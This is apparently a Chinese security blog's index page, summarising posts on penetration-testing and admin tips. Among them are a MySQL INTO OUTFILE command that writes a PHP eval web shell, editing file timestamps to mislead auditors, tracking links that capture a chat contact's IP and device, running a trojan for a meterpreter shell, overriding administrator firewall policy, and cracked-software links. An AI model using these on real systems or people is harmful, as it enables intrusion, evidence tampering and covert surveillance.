小tips
安全大哥
接渗透测试,护网,安全咨询,安全培训,安全溯源,应急响应等业务,需要私信我
展开
-
使用fofa搜索chatgpt网站使用
1、fofa搜索关键词。原创 2023-03-20 17:46:24 · 6790 阅读 · 0 评论 -
使用powershell-ise读取大文件
打开一个比较大的txt,比如超过500M,正常的话notepad++和windows自带的txt都是没办法进行直接打开的,这个使用需要使用powershell进行打开。按行读取文件(读取前100行)读取整个文件txt文件。原创 2023-03-20 17:23:31 · 630 阅读 · 0 评论 -
使用Powershell修改文件时间
只需要简单几条命令即可修改pdf等文件的时间,用来应付审计。原创 2022-09-17 13:08:36 · 1019 阅读 · 0 评论 -
侦察系列之杀猪盘作案流程
作案步骤何谓杀猪盘,指的是诈骗分子利用网络交友 ,获取受害人充分信任后,诱导受害人投资赌博的一种电信诈骗方式 。“杀猪盘”是“从业者们”(诈骗团伙)自己起的名字,是指放长线“养猪”诈骗,养得越久,诈骗得越狠。整个杀猪盘作案流程可以分为三个步骤:找猪、养猪、杀猪。作案流程整个杀猪盘团伙几乎都在国外,一般为上百人的专业团队,分工明确。下图为社交行业杀猪盘的具体作案流程详解:一、准备阶段团伙招募培训,需要对作案人员进行招募,进行统一管理和话术培训;社交账号注册,在实施“杀猪”诈骗前,需原创 2022-03-26 21:15:29 · 3711 阅读 · 0 评论 -
侦察系列之IP查询网址推荐
具体地址如下:1、高精度IP定位1 - openGPS.cn2、ip地址查询 ip查询 查ip 公网ip地址归属地查询 网站ip查询 同ip网站查询 iP反查域名 iP查域名 同ip域名3、IP查询_专业的 IP 地址库_IPIP.NET4、IP/IPv6查询,服务器地址查询 - 站长工具...原创 2022-03-23 16:19:13 · 2965 阅读 · 0 评论 -
侦查系列之微信用链接查看对方IP(包括机型、系统版本等信息)
MaiTube可以快速的将某个链接进行套装重定向。比如用 A链接指向B链接,而B链接是目标链接。当A链接打开的时候,迅速的进行打开行为的记录,然后快速的帮助用户指向B链接。打开行为通常包括 “打开的浏览器”,“ip地址”,“时区”。某些网站声称可以追踪电池电量,CPU型号等。但是无法记录MAC地址。链接生成页面如果你在输入完整的链接地址栏里输入的是百度的网址,那么对方打开可追踪链接或者扫描二维码会跳转到百度的页面,仍然原创 2022-03-22 21:12:03 · 18896 阅读 · 8 评论 -
安全思维导图集合
1、https://github.com/SecWiki/sec-chart2、https://github.com/phith0n/Mind-Map原创 2021-10-11 18:19:47 · 1474 阅读 · 0 评论 -
Linux将命令运行结果输出到文件当中
1. 仅转向不显示(1)ls > test.txt 把输出转向到指定的文件,如文件已存在的话也会重新写入,文件原内容不会保留(2)ls >> test.txt 是把输出附向到文件的后面,文件原内容会保留下来2. 转向同时显示ls | tee ls_tee.txt 把输出转向到指定的文件,同时显示,原文件内容不保存ls | tee ls_tee.txt 原文件内容保存...原创 2021-07-21 17:10:55 · 9460 阅读 · 0 评论 -
调用Poweshell实现telnet
1、公司网络cmd禁用了telnet命令,那么我们如果还需要继续使用telnet这个命令的话可以用powershell去实现啦。具体命令格式如下所示:Test-NetConnection -ComputerName <IP> -Port <Port>Test-NetConnection -ComputerName 172.16.6.117-Port 80...原创 2021-07-13 16:31:25 · 2714 阅读 · 0 评论 -
【收藏】Android软件安全工程师节技能表导图
导图如下:原创 2020-12-21 17:55:50 · 191 阅读 · 0 评论 -
防火墙问题解决办法-----“出于安全原因,某些设置由系统管理员进行管理”
1、进入控制面板->系统和安全->Windows防火墙无法正常打开或关闭,上方显示"出于安全原因 某些设置由系统管理员管理”解决方法将文件夹选项设置成如图方式2打开此电脑,将:C:\Windows\System32\GroupPolicyUsers 文件夹清空;3打开:C:\Windows\System32\GroupPolicy将文件夹中所有文件删除;4在GroupPolicyUsers文件夹中创建cmd的快捷方式原创 2020-08-18 15:39:43 · 33267 阅读 · 8 评论 -
渗透系列之Proxilier搭建使用
渗透系列之Proxilier搭建使用注:成功搭建使用shadowshocks实现代理访问google,然而只能浏览器代理方式使用,不能其他程序使用代理,不利于白帽子匿名安全检测,下面将介绍利用Proxifier实现全局代理。Proxilier注册码:http://www.seotest.cn/jishu/46462.htmlProxilier下载链接:链接:https://pan.baidu.com/s/1ZYE9VyYsANYz1RYuqmPDSA 提取码:q3fr1、..原创 2020-06-11 16:17:46 · 3892 阅读 · 0 评论 -
测试技巧之fiddle包复制到bp不乱码
测试技巧之fiddle包复制到bp不乱码本文目的公司测试人员都是使用fiddle进行抓包测试,但是安全人员使用burpsuite比较大,且该项目组任务都是app,工作量较大,所以某些功能为了节约时间直接让测试人员提供fiddle的post包文给安全人员进行测试,能够快速的提升工作效率。Burpsuite2020版本链接下载:链接:https://pan.baidu.com/s/1Ey6Cp5t5pj-LmF-vsKnMQQ提取码:a1yy复制这段内容后打开百度网盘手机App,操作更方便原创 2020-06-11 15:42:55 · 1110 阅读 · 0 评论 -
使用burpsuite和fiddle进行串联抓包
1、普及代理工具知识点Fiddler这个代理工具是基于.Net,用c#语言编写,入门简单,功能强大,但是目前只适用于win;burpsuite是java写的,burpsuite是从底层包中解析http流量,而且具有跨平台的优势;Wireshark各个平台都有相应版本,不过门槛相对较高。Fiddler和burpsuite在抓包上偏向请求和响应的数据,但是wireshark偏向于数据帧...原创 2019-07-30 16:02:26 · 12158 阅读 · 2 评论 -
安全学习技能树
github地址:https://github.com/ym2011/SecurityTechnique原创 2019-06-11 01:27:54 · 1807 阅读 · 0 评论 -
windows系统的host文件位置
位置:C:\Windows\System32\drivers\etc原创 2019-06-14 14:38:59 · 93460 阅读 · 1 评论 -
Linux进入nano模式退出方法
Linux进入nano模式,出现如下样子:G Get Help ^O Write Out ^W Where Is ^K Cut Text ^J Justify ^C Cur Pos M-U Undo M-A Mark Text M-] To Bracket M-Q Previous^X Exit ...原创 2019-05-27 16:49:47 · 23672 阅读 · 0 评论 -
mysql写入一句话木马
前提:root权限,知道了服务器的web的绝对路径,尝试写入一句话mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php"注意事项:1、绝对路径的猜解2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...原创 2018-07-16 17:51:15 · 10834 阅读 · 4 评论 -
nsfocus远程安全评估系统报告提取信息脚本
# coding=utf-8from bs4 import BeautifulSoupimport xlwt"""采集移动漏扫报中主机端口,banner信息和漏洞信息python2.7"""ip_port = []ip_alarm = []#获取主机def get_host_list(filename): ips = [] with open(filena...原创 2018-08-15 17:10:56 · 948 阅读 · 0 评论 -
windows下的dir命令的小tip
使用dir命令将目录下面的所有文件名导出到一个txt文件中:如下:我们需要将C:\Users\liuyang\Desktop\业支测试\shadow文件爆破\shadow目录下的所有shadow文件名取出来,这个时候需要用到以下命令dir *shadow.txt /b >shadow.txt*.shadow.txt是匹配所有文件名,/b是只取该目录下的文件名而已, >是重定...原创 2018-09-18 14:59:24 · 1966 阅读 · 0 评论 -
github平台上的安全工具集
参考:https://www.cnblogs.com/hookjoy/p/9380345.html参考:https://github.com/We5ter/Scanners-Box原创 2018-11-02 10:40:32 · 453 阅读 · 0 评论 -
msf拿到windows的shell显示乱码解决方法
0x01:渗透的时候拿到一台windows7的权限,但使用msf显示乱码,很不舒服 0x02:使用 chcp 65001 这条语句即可解决原创 2018-11-02 15:28:52 · 13518 阅读 · 7 评论 -
windows使用命令执行exe文件
很多时候我们需要在目标windows的机器上执行exe文件获取meterpreter,这个时候只需要执行一条简单的命令进入木马的文件夹,执行 start+空格+xxx.exe原创 2018-11-12 11:26:06 · 23081 阅读 · 0 评论 -
ppt中图片淡入淡出方法
通常我们制作ppt方案时候需要将其图片按照顺序播放,这个时候就需要我们设置动画模式第一步:点击动画,有多种方式可以选择(淡出、飞入、浮入),按照自己的需求选择一种即可第二步:点击添加动画,同样有多种方式可以选择哦(淡出、飞出、浮出等等),按照自己的需求选择一种合适的风格即可...原创 2019-02-15 15:45:04 · 4231 阅读 · 0 评论 -
方程式组织攻击模块图
原创 2019-02-15 16:00:34 · 868 阅读 · 0 评论 -
web漏洞集合示意图
原创 2019-02-15 16:02:37 · 616 阅读 · 0 评论 -
GandCrab解密工具下载
老外解密工具下载地址:https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/原创 2019-02-20 18:29:35 · 734 阅读 · 0 评论 -
敏感词汇检测
1、今天做测试的时候抓到一个数据包,发现一个txt文件(CensorWords.b7e4bfb.txt),第一眼反应以为是系统被入侵了,被入侵者传了个txt到服务器上面,后面发现不对啊,攻击的话也不应该上传这种txt,后门把这个txt丢百度一查,原来是敏感词汇检测。0x02;敏感词汇检测实现:1、首先创建敏感词汇文件 需要准备一个txt格式的文件用于存放需要过滤的敏感词汇,这...原创 2019-04-18 17:44:10 · 26348 阅读 · 0 评论 -
Pycharm2019.1版本破解-实践有效
参考【裸睡的猪】的破解方法:https://mp.weixin.qq.com/s/MGn_IgK8ZmVYq0jGqMSbaA原创 2019-04-24 11:01:51 · 24289 阅读 · 12 评论 -
基于微信模板的一对多消息推送服务
参考项目:https://pushbear.ftqq.com/admin/#/原创 2019-05-25 15:06:23 · 1394 阅读 · 0 评论 -
ESAPI结合Top10安全开发实战
原文:http://liehu.tass.com.cn/archives/1427转载 2019-05-25 15:26:02 · 1169 阅读 · 0 评论 -
windows10桌面小tip
0x01:个人一直没有收藏什么好看的壁纸,索性就直接用的windows10自带的,我们用windows10自带的锁屏壁纸都是周期性更换的,但我偶尔发现有那么一部分确实很漂亮,就寻思如何把他dump下来,设为桌面,下面就说下方法。0x02:直接进入这个文件目录:C:\Users\你的用户名哈\AppData\Local\Packages\Microsoft.Windows.ContentDelive...原创 2018-04-05 19:35:07 · 4738 阅读 · 0 评论